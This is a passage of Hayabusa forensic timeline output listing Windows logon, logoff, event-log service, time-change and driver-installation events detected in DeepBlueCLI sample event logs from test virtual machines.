2302014-11-26 07:38:48.104 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27008 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2312014-11-26 07:38:48.104 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27038 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2322014-11-26 07:48:51.643 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x27038rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2332014-11-26 07:50:17.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2342014-11-26 07:51:16.890 +09:00IE9Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2352014-11-26 07:51:19.000 +09:00IE9Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2362014-11-26 07:51:22.000 +09:00IE9WIN74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2372014-11-26 07:51:29.601 +09:00IE9Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2382014-11-26 07:51:34.460 +09:00IE9Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2392014-11-26 07:51:34.460 +09:00IE9Win74672infoAdmin LogonUser: IEUser | LID: 0x12048rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2402014-11-26 07:51:34.460 +09:00IE9Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12048 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2412014-11-26 07:51:34.460 +09:00IE9Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12070 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2422014-11-26 08:03:14.476 +09:00IE9Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x12070rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2432014-11-26 08:03:47.000 +09:00IE9Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2442014-11-27 02:34:54.687 +09:00IE9Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2452014-11-27 02:34:56.000 +09:00IE9Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2462014-11-27 02:34:59.000 +09:00IE9WIN74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2472014-11-27 02:35:04.667 +09:00IE9Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2482014-11-27 02:35:09.745 +09:00IE9Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2492014-11-27 02:35:09.745 +09:00IE9Win74672infoAdmin LogonUser: IEUser | LID: 0x131c3rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2502014-11-27 02:35:09.745 +09:00IE9Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x131c3 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2512014-11-27 02:35:09.745 +09:00IE9Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x13216 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2522014-11-27 02:35:57.635 +09:00IE9Win74648infoPrivEsc | LatMovExplicit LogonSource User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.localrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2532014-11-27 02:41:21.932 +09:00IE9Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x13216rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2542014-11-27 02:42:44.000 +09:00IE9Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2552014-11-27 02:43:31.734 +09:00IE9Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2562014-11-27 02:43:34.000 +09:00IE9Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2572014-11-27 02:43:40.000 +09:00IE9Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2582014-11-27 02:43:56.893 +09:00IE9Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2592014-11-27 02:44:39.689 +09:00IE9Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2602014-11-27 02:44:39.689 +09:00IE9Win74672infoAdmin LogonUser: IEUser | LID: 0x36aedrules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2612014-11-27 02:44:39.689 +09:00IE9Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36aed | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2622014-11-27 02:44:39.689 +09:00IE9Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36b1d | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2632014-11-27 02:59:00.431 +09:00IE9Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2642014-11-27 03:15:07.962 +09:00IE9Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x36b1drules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2652014-11-27 03:16:14.000 +09:00IE9Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2662014-11-27 03:17:04.250 +09:00IE10Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2672014-11-27 03:17:05.000 +09:00IE10Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2682014-11-27 03:17:08.000 +09:00IE10Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2692014-11-27 03:17:13.369 +09:00IE10Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2702014-11-27 03:17:19.150 +09:00IE10Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2712014-11-27 03:17:19.150 +09:00IE10Win74672infoAdmin LogonUser: IEUser | LID: 0x11c02rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2722014-11-27 03:17:19.150 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c02 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2732014-11-27 03:17:19.150 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c32 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2742014-11-27 03:30:25.009 +09:00IE10Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x11c32rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2752014-11-27 03:30:40.000 +09:00IE10Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2762014-11-27 08:21:46.785 +09:00IE10Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2772014-11-27 08:21:47.000 +09:00IE10Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2782014-11-27 08:21:48.000 +09:00IE10Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2792014-11-27 08:21:50.498 +09:00IE10Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2802014-11-27 08:21:50.498 +09:00IE10Win74672infoAdmin LogonUser: IEUser | LID: 0x170f5rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2812014-11-27 08:21:50.498 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x170f5 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2822014-11-27 08:21:50.498 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x17125 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2832014-11-27 08:23:13.147 +09:00IE10Win77045infoNew Service InstalledName: TP AutoConnect Service | Path: "C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe" | Account: LocalSystem | Start Type: auto startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2842014-11-27 08:23:13.240 +09:00IE10Win77045infoNew Service InstalledName: TP VC Gateway Service | Path: "C:\Program Files\VMware\VMware Tools\TPVCGateway.exe" | Account: LocalSystem | Start Type: auto startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2852014-11-27 08:23:19.075 +09:00IE10Win77045infoNew Service InstalledName: VMware VMCI Bus Driver | Path: system32\DRIVERS\vmci.sys | Account: | Start Type: boot startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2862014-11-27 08:23:30.884 +09:00IE10Win77045infoNew Service InstalledName: Microsoft Memory Module Driver | Path: system32\DRIVERS\pnpmem.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2872014-11-27 08:23:31.757 +09:00IE10Win77045infoNew Service InstalledName: vSockets Driver | Path: C:\Windows\system32\drivers\vsock.sys | Account: | Start Type: boot startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2882014-11-27 08:23:33.349 +09:00IE10Win77045infoNew Service InstalledName: VMware Host Guest Client Redirector | Path: system32\drivers\vmhgfs.sys | Account: | Start Type: system startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2892014-11-27 08:24:11.865 +09:00IE10Win77045infoNew Service InstalledName: Microsoft 1.1 UAA Function Driver for High Definition Audio Service | Path: system32\drivers\HdAudio.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2902014-11-27 08:24:17.909 +09:00IE10Win77045infoNew Service InstalledName: Microsoft Streaming Clock Proxy | Path: system32\drivers\MSPCLOCK.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2912014-11-27 08:24:18.237 +09:00IE10Win77045infoNew Service InstalledName: Microsoft Streaming Quality Manager Proxy | Path: system32\drivers\MSPQM.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2922014-11-27 08:24:19.969 +09:00IE10Win77045infoNew Service InstalledName: Microsoft Streaming Service Proxy | Path: system32\drivers\MSKSSRV.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2932014-11-27 08:24:20.281 +09:00IE10Win77045infoNew Service InstalledName: Microsoft Streaming Tee/Sink-to-Sink Converter | Path: system32\drivers\MSTEE.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2942014-11-27 08:24:20.452 +09:00IE10Win77045infoNew Service InstalledName: VMware USB Pointing Device | Path: system32\DRIVERS\vmusbmouse.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2952014-11-27 08:24:23.245 +09:00IE10Win77045infoNew Service InstalledName: Microsoft Trusted Audio Drivers | Path: system32\drivers\drmkaud.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2962014-11-27 08:24:30.249 +09:00IE10Win77045infoNew Service InstalledName: Bluetooth Radio USB Driver | Path: System32\Drivers\BTHUSB.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2972014-11-27 08:24:31.310 +09:00IE10Win77045infoNew Service InstalledName: Bluetooth Port Driver | Path: System32\Drivers\BTHport.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2982014-11-27 08:24:33.925 +09:00IE10Win77045infoNew Service InstalledName: Bluetooth Request Block Driver | Path: system32\DRIVERS\BthEnum.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2992014-11-27 08:24:34.362 +09:00IE10Win77045infoNew Service InstalledName: Bluetooth Device (RFCOMM Protocol TDI) | Path: system32\DRIVERS\rfcomm.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3002014-11-27 08:24:36.015 +09:00IE10Win77045infoNew Service InstalledName: Bluetooth Device (Personal Area Network) | Path: system32\DRIVERS\bthpan.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3012014-11-27 08:24:38.153 +09:00IE10Win77045infoNew Service InstalledName: VMware Pointing Device | Path: system32\DRIVERS\vmmouse.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3022014-11-27 08:24:38.823 +09:00IE10Win77045infoNew Service InstalledName: Memory Control Driver | Path: C:\Program Files\Common Files\VMware\Drivers\memctl\vmmemctl.sys | Account: | Start Type: auto startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3032014-11-27 08:24:39.011 +09:00IE10Win77045infoNew Service InstalledName: VMware Vista Physical Disk Helper | Path: C:\Program Files\VMware\VMware Tools\vmrawdsk.sys | Account: | Start Type: system startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3042014-11-27 08:24:41.647 +09:00IE10Win77045infoNew Service InstalledName: vm3dmp | Path: system32\DRIVERS\vm3dmp.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3052014-11-27 08:24:44.783 +09:00IE10Win77045infoNew Service InstalledName: VMware Tools | Path: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" | Account: LocalSystem | Start Type: auto startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3062014-11-27 08:24:53.788 +09:00IE10Win77045infoNew Service InstalledName: VMware Snapshot Provider | Path: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Account: NT AUTHORITY\LocalService | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3072014-11-27 08:25:04.605 +09:00IE10Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x17125rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3082014-11-27 08:25:05.000 +09:00IE10Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3092014-11-27 08:25:51.420 +09:00IE10Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3102014-11-27 08:25:53.000 +09:00IE10Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3112014-11-27 08:25:54.000 +09:00IE10Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3122014-11-27 08:25:55.414 +09:00IE10Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3132014-11-27 08:25:55.414 +09:00IE10Win74672infoAdmin LogonUser: IEUser | LID: 0x1ac86rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3142014-11-27 08:25:55.414 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ac86 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3152014-11-27 08:25:55.414 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b245 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3162014-11-27 08:26:40.560 +09:00IE10Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x1b245rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3172014-11-27 08:26:42.000 +09:00IE10Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3182014-11-29 00:46:09.645 +09:00IE10Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3192014-11-29 00:46:10.000 +09:00IE10Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3202014-11-29 00:46:10.000 +09:00IE10Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3212014-11-29 00:46:12.437 +09:00IE10Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3222014-11-29 00:46:12.437 +09:00IE10Win74672infoAdmin LogonUser: IEUser | LID: 0x1a23arules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3232014-11-29 00:46:12.437 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a23a | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3242014-11-29 00:46:12.437 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a265 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3252014-11-29 00:48:19.456 +09:00IE10Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x1a265rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3262014-11-29 00:48:20.000 +09:00IE10Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3272016-08-18 23:46:21.750 +09:00IE10Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3282016-08-18 23:46:21.750 +09:00IE10Win74672infoAdmin LogonUser: IEUser | LID: 0x1e056rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3292016-08-18 23:46:21.750 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e056 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3302016-08-18 23:46:21.750 +09:00IE10Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e3c9 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3312016-08-18 23:46:33.911 +09:00IE10Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x1e3c9rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3322016-08-18 23:46:34.426 +09:00IE10Win74634infoLogoffUser: IEUser | LID: 0x1e3c9rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3332016-08-18 23:46:34.426 +09:00IE10Win74634infoLogoffUser: IEUser | LID: 0x1e056rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3342016-08-18 23:47:04.676 +09:00IE10Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3352016-08-18 23:47:04.676 +09:00IE10Win74672infoAdmin LogonUser: IEUser | LID: 0x6831frules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
